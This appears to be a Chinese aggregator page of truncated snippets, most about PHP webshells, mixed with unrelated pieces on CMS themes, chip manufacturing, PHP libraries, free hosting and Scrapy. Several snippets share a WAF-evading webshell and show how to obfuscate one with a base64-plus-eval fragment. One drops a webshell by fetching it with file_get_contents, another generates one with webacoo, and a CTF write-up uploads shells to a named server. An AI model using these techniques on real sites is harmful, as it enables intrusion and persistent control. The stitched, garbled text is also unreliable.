分享一款博主一直在用的很不错的大马,PHP免杀过waf-幽灵ColdBlue免杀版本[官方去除后门版],此大马只为安全测试,请勿用于非法用途,如有问题,博主概不负责!
最新帮朋友做个企业站,说白了就是个简单的CMS。 纯展示类的。这种东西技术含量低,千万不要自己从头开发,只要找个现成的cms,改改模板就可以了。时间就是金钱,会改就可以。...我知道有dede,帝国的存在,不过没用过,感觉也挺麻烦了。如果有简单的就更好了。 之前我也做过一个纯展示类的,是基于 DouPHP,不过最高只支持PHP5.2。...我的服务器装的PHP7.1和 PHP7.2。我选择不妥协。 于是乎,又去找了其他的cms,经过对比,最终选择了蝉知,说实话这个名字起的一般,很容易打出产值。...用了一阵发现有几个好处: 开源,github上有源码 定制化比较高,特别是后台有个可视化功能很好用 ? image.png 而且还可以为页面添加自定义css和js。...image.png 编辑移动版header的地址是 /system/tmp/template/mobile/block/header.html.php 比如想改logo,这里有个小bug
这篇笔记介绍下铜的大马士革镶嵌工艺。小豆芽之前对于金属图案的理解是先沉积一层金属,然后再通过干法刻蚀的方法形成图案。最近才发现自己的理解不够全面。...但是如果采用传统的气体plasma刻蚀方法,铜的生成物是固态,而不是气态,它的刻蚀速度比Al小一个量级。因此,人们提出了大马士革镶嵌(Damascene plating)的方法来形成铜的互联线。...(图片来自https://www.xuehua.us/2018/06/20/原创设计典范-大马士革镶嵌黄金戒指/) 对于铜互联线的镶嵌工艺,正是借鉴了这一思想,先是对介质进行刻蚀,形成孔洞,然后沉积金属铜...图片来自https://commons.wikimedia.org/wiki/File:Dual-Damascene-Prozess_(self_aligned;_Schautafel).svg) 以上是对大马士革镶嵌工艺的简单介绍...在半导体工艺流程中,大马士革镶嵌工艺是非常重要的一个步骤。细想起来,也就是捡软柿子捏,无法直接对Cu刻蚀,就欺负软柿子——介质层,然后让硬柿子填充到安排好的座位中。
正常情况下客户端的退出会导致服务器端脚本停止运行。 4、highlight_string() 当你想把PHP代码显示到页面上时,highlight_string()函数就会显得非常有用。...这个函数会把你提供的PHP代码用内置的PHP语法突出显示定义的颜色高亮显示。这个函数有两个参数,第一个参数是一个字符串,表示这个字符串需要被突出显示。...第二个参数如果设置成TRUE,这个函数就会把高亮后的代码当成返回值返回。 用法: <?php highlight_string('<?php echo phpinfo();'); ?...> 5、highlight_file 这是一个非常有用的PHP函数,它能返回指定的PHP文件,并按照语法语义用高亮颜色突出显示文件内容。其中的突出显示的代码都是用HTML标记处理过的。 用法: 6、php_strip_whitespace 这个函数也跟前面的show_source()函数相似,但它会删除文件里的注释和空格符。 用法: <?
1.亿家免费国内PHP空间 这是我见过最好的免费国内PHP空间了,这个BLOG就是由他的空间支撑的,所以你看到我这个空间的稳定,快速就代表着他们空间的优质了,推荐 注册地址:www.e9china.net...这个先要在他们论坛上发帖子,当你在论坛里的号升级后,就可以到相应版块去提交申请免费国内PHP空间了,具体多少级我记不得了,现在论坛改版本了,我都成新手上路了··· 这个免费国内PHP空间你得到后,不需要你再做任何动作了...,不过还是去论坛逛逛吧,感恩一下哦··· 2.5i8我爱吧免费国内PHP空间 这个免费国内PHP空间是150MB,1.5GB的月流量,是新加坡的服务器,速度和稳定性很不错 注册地址:bbs.5i8.us...这个要求更低了,只要你发5个主题贴,就是5个威望,到免费PHP空间申请区去发帖申请就行了,一般很快就可以给你开通了 纯正CPANEL控制面板,函数几乎都支持,不过他要求在他的免费空间里需要加上一些GG...广告··· 3.地平线站长学院免费国内PHP空间 这个免费国内PHP空间相对来说也很不错,有两个分站,在主站上有链接,分别是甘肃电信和河北网通,主站是温州电信的,我就提供主站地址了 注册地址:www.121xx.net
介绍 TimThumb 是一个非常简洁方便的、用于裁图的 PHP 程序。只要给它设置一些参数,它就可以生成指定图片的缩略图甚至是直接给指定的网站截图。...现在很多 WordPress 主题中,都使用的是 TimThumb 这个 PHP 类库进行缩略图处理。...(本博客使用的 Nana 主题中的文章略缩图也是用 TimThumb 处理的) 使用方法 http://你的网址/timthumb.php?...zip","_blank")'>点击下载 本文仅为博主学习记录,便于日后查找,转载自TimThumb——超好用的...PHP 略缩图裁剪插件
这是一个高性能的PHP封装的HTTP Restful多线程并发请求库,参考借鉴了httpresful 、multirequest等优秀的代码。它与PHP 5.4和hhvm兼容。...大家好,今天的主角是它: https://github.com/sinacms/MultiHttp ,这是本人写的一个curl工具库,在生产中十分好用,所以拿出来分享给大家,欢迎大家提issue/merge...request, 点赞什么的。...CURLOPT_TIMEOUT_MS', // milliseconds, libcurl version > 7.36.0 , 怎么样,什么人性、直观吧, 另外,建议大家用最新stable版本, 有很多好用的...feature, 比如 expectsJson() 会直接验证response是json,并解析成php array( or hashmap),更多特性请看tests目录的使用。
支持所有版本 PHP Swoole Tracker 2.8.3 发布,这个版本开始全面支持 PHP5.4,PHP5.5 和 PHP5.6,做这个兼容之前很多人和我说这是个收益非常低的事情,因为未来肯定是...PHP7 用户多,我们做这事有以下几点原因: 无法迁移到PHP7 很多重度使用 PHP 的公司会有历史遗留的项目,由于业务过于复杂或其他原因(比如自己写了个 PHP5 的扩展,维护扩展的人又离职了)无法迁移...PHP5 太成功了,另一部分原因是这些公司请求量不大,对 PHP 版本没概念,大部分非计算机专业出身,甚至被一线大厂津津乐道的 Golang/协程都没听过,这就是 PHP--一门非常实用的草根语言。...,后来Tideways扩展出现了,但是这个扩展不支持 PHP5,Tracker目前最低支持到PHP54,即使你的项目中有非常老的代码,也可以用统一的方式定位性能问题。...让Swoole Tracker成为所有 PHP 程序员的必备工具是我们这个产品的最终目标!
前言 写过PHP的同学都知道 PHP的数组Array非常好用,特别灵活。 我在写PHP之前使用Java做安卓开发,在接触PHP的数组Array之后,直呼太香了!...PHP的数组array灵活。...初识GoFrame 最近在使用基于Go语言的GoFrame框架开发项目,发现GoFrame封装的garray竟然比PHP的array还要好用。...显然PHP是不支持并发安全开关的,PHP的数组是并发安全的。PHP-FPM是阻塞的单线程模型,PHP-FPM每个进程里只有一个线程,一个进程同时只能服务一个客户端。...天然支持升序遍历、遍历修改 天然支持序列化和反序列化 大家是不是明显感觉到GoFrame的garray比PHP的array还要好用。
本文作者:s9mf 对于很多,和我一样刚刚入门,或者还在门边徘徊的小伙伴们,在渗透学习的过程中,总会遇到各种情况,例如 php 大马被 waf 拦截的时候,那么如何制作免杀 php webshell 呢...一. webshell 免杀 0x0 php 内置函数加密 小例子: 在制作免杀大马之前,我们先来看看,一个带后门的免杀 php 大马是如何制作的。 ? 在后门网站 webshell8 下载好大马。...';*/ 0x1 php 自定义加密 一图胜千言 ? 0x2 敏感函数免杀 主要是关键字的免杀,我一般直接偷网上带后门大马的。...$e;$a=$love('PHP大马BASE64加密内容');eval/**/(/**/(/**/$a=$a)/**/); ? 这让我想起,D 哥的一条微博,不禁菊花一紧。。 ? 且用且珍惜。 二....更小更方便 为了减小大马体积,我们常常使用 php 读取网络文件 curl, fsockopen ,file_get_contents 函数,这样的大马整体体积甚至只有几百字节,但是要注意,目标网站要是禁用了
小马和大马 小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。...网页大马 大马的体积就比较大了,通常在50K左右,比小马会大好多倍,但对应的功能也很强大,包括对数据的管理,命令的操作,数据库的管理,解压缩,和提权等功能,都非常强大。...这种大马一旦网站被种了,网站基本就在这个大马控制之中。大马的隐蔽性不好,因为涉及很多敏感代码,安全类程序很容易扫描到。...我们这里说的小马和大马是指网页类型中的,小马就是为了配合上传大马的,这是它最主要的作用,还有就是小马可以当做备用的后门来使用,一般大马容易被发现,而小马则更容易隐藏在系统的文件夹中。...来看看一个大马利用实例:在虚拟机中往DVWA上传PHP大马(源码附在最后): 访问木马文件123.php,提交密码123456后进入大马的功能列表,下图所示为文件管理功能: 继续访问下命令执行功能
看到表哥有大佬带就是好,文章最后 Damian 表哥也分享了文章的免杀大马和 1.php ? 赶紧下载下来怕百度云分享失效。 ? 长夜漫漫,好鸡儿无聊啊,打开表哥的免杀大马分析一波。 ?...分析大马 细致假装分析首先看这段。我们去掉 ' . 很明显浮现在我们面前的是 php 代码,是的没错同学们。 ?...前面我们知道了,大马源码是经过加密的,那我们要分析大马源码是不是得先解密呢,其实很简单。 我们知道 eval 是执行解密后 php 代码 ?...那我还分析个毛代码,火狐卸载卸载...其实我们可以 Burp 抓包 先抓包 php.php 运行的包 ? 右键选择 Send to Repeater 转到 Repeater 模块 ?...声明 我并不是指文章中的给表哥 Damian 免杀大马的大佬是这个大马的作者,很明显,这是后门狗做的,常见后门狗网站 www.mumaasp.com webshell8.com 其他小伙伴还知道的 可以留言下
admin 文件管理器存在任意文件上传 图里面的webshell.php和test.php都是我上传的大马。...为什么上传两个大马?...test.php有个搜索文件的功能,有利于我们找falg,但是这个大马查看文件的时候会403(所以用了webshell.php打包系统文件下载下来,进行查看),这个大马还有执行系统函数的模块,但是很明显执行不了...我看了一下phpinfo的信息。如下图: 再来看看上传后的大马: test.php:搜索flag.txt,整个C盘确实就搜到这么一个flag.txt文件。...登录webshell大马:admin 打包flag.txt,base64解密一下即可。 代码执行漏洞 先访问http://106.54.65.253/dede/tpl.php?
后台帐号密码:admin admin 文件管理器存在任意文件上传 图里面的webshell.php和test.php都是我上传的大马。 为什么不是先传小马呢?...因为一开始我已尝试了小马,菜刀链接时显示200ok就断掉了,至于什么原因导致的,我还没整明白。(提问???????给阿浪) 但是大马为什么成功? 我也就是想都尝试一下,看看运气。...test.php有个搜索文件的功能,有利于我们找falg,但是这个大马查看文件的时候会403(所以用了webshell.php打包系统文件下载下来,进行查看),这个大马还有执行系统函数的模块,但是很明显执行不了...我看了一下phpinfo的信息。如下图: ? 再来看看上传后的大马: ? test.php:搜索flag.txt,整个C盘确实就搜到这么一个flag.txt文件。...登录webshell大马:admin 打包flag.txt,base64解密一下即可。 ? 代码执行漏洞 先访问http://106.54.65.253/dede/tpl.php?
小马和大马 小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。...网页大马 大马的体积就比较大了,通常在50K左右,比小马会大好多倍,但对应的功能也很强大,包括对数据的管理,命令的操作,数据库的管理,解压缩,和提权等功能,都非常强大。...这种大马一旦网站被种了,网站基本就在这个大马控制之中。大马的隐蔽性不好,因为涉及很多敏感代码,安全类程序很容易扫描到。...我们这里说的小马和大马是指网页类型中的,小马就是为了配合上传大马的,这是它最主要的作用,还有就是小马可以当做备用的后门来使用,一般大马容易被发现,而小马则更容易隐藏在系统的文件夹中。...来看看一个大马利用实例:在虚拟机中往DVWA上传PHP大马(源码附在最后): 图片 访问木马文件123.php,提交密码123456后进入大马的功能列表,下图所示为文件管理功能: 图片
大马与小马 在几年前很流行的网站入侵打油诗中有写: 进谷歌 找注入 没注入 就旁注 没旁注 用0day 没0day 猜目录 没目录 就嗅探 爆账户 找后台 传小马 放大马 拿权限 挂页面 放暗链 清数据...清日志 留后门 其中的传小马上大马就是我们要说的小马大马了,小马的功能一般都比较单一,作用一般是向服务器中写入文件数据。...大马一般就提供了更多的功能,例如辅助提权,执行sql语句,反弹shell等。...不过网上很多的大马都加了后门,例如图中的这款从mumaasp.com这个网站下载的一款大马会将木马的地址和密码提交到http://www.mumaasp.com/xz/sx.asp这个网址 ?...不推荐作为持续性攻击的权限维持的选择 webacoo -g -o /root/webacoo.php 生成webacoo.php存放在/root目录下 ?
最近想要找一段代码判断移动pc,以便隐藏显示不同内容,结果找网上的好多都是同一个版本比较复杂不太好用,其实WordPress本身自带了函数判断移动还是pc设备的,wp_is_mobile();这个是可以直接使用的...; 如果需要在非WordPress网站使用,可以把函数真身找到,稍微做个改良即可,比较简单也比较好用,顺便分享一下; <?...php /*PHP判断是否是移动端*/ function is_mobile() { if ( empty($_SERVER['HTTP_USER_AGENT']) ) { return false;...> 网上大多是一两个版本,总体看起来比较复杂一些的,这个是wordpress源码里都在使用的,准确性应该不会差。
「模型无所谓大小,我们说正确的模型,重要看机制是否正确,这才是智能的本质。」 在他看来,真正的智能不仅仅是数据和算力的堆砌,而是更深层次的理解和洞察——是对数据压缩、模式识别和自主学习的深刻把握。...马毅认为人的记忆就是对世界的建模,「忆生」就是「记忆生成」的缩写 。「虽然记忆本身是死的,但生成可以是活的。」 在谈及 AGI 时,他抛出一个问题:GPT-4 和刚出生的婴儿,谁更有知识?...我个人认为,我们需要先看到一些更加可控的、可解释的甚至更完整的系统,再去研究它的下一步,看是否能把该系统工程化的实现,做出完整的自主型系统。...所以,真正的智能所需要的计算实际上是非常高效和简洁的,我们的白盒理论就是要告诉大家什么样的计算是智能真正需要的,把黑盒理论当中不必要的冗余全部舍去。...智能就是先把最容易、最好解的、对生存最有利的东西,用最小的代价先把它最大规模的实现了,然后再逐步的往上近一步的去解决其他的问题。
最后答案却在bob.php里,我请求http://xxx/bob.php的时候应该被转向到rewrite.php里了才对呀?这种毫无实战价值的题目,真想不到你们的工程师是怎么想到的。...第一题是一个wordpress,还是感觉自己准备不足,居然手里没有好用的wpscan,kali里那个不好用。就先放着了。...传大马能包含,但包含了执行出问题,估计是因为包含进去的大马变量受限制了。后来写了个脚本,在根目录生成了个大马: <?...php file_put_contents('hehe.php', file_get_contents('刚才传上来的大马地址')); ?> 然后拿下了shell。...下午用习科大马里自带的弹shell功能弹了一个shell,但用了各种提权程序没成功,估计是因为64位的,我不太会。
他们具体的工作流程是什么?...答:Scrapy架构有5个组件:分别为 引擎、爬虫文件(负责数据解析处理的)、调度器(负责维护请求队列的)、 下载器(负责发请求得到响应对象的)、项目管道(负责数据处理的) 大致的工作流程是:爬虫项目启动...拿到的response通过引擎交给爬虫。爬虫文件负责具体的数据解析提取,提取出来的数据交给项目管道进行处理;如果是要继续跟进的URL地址,则再次交给调度器入队列,如此循环。...items.py:爬虫项目的数据容器文件,用来定义要获取的数据。 pipelines.py:爬虫项目的管道文件,用来对items中的数据进行进一步的加工处理。...1.3 写爬虫文件 代码中的li_list的xpath可能写的不准确,但是大概思路是这样的。
领取专属 10元无门槛券
手把手带您无忧上云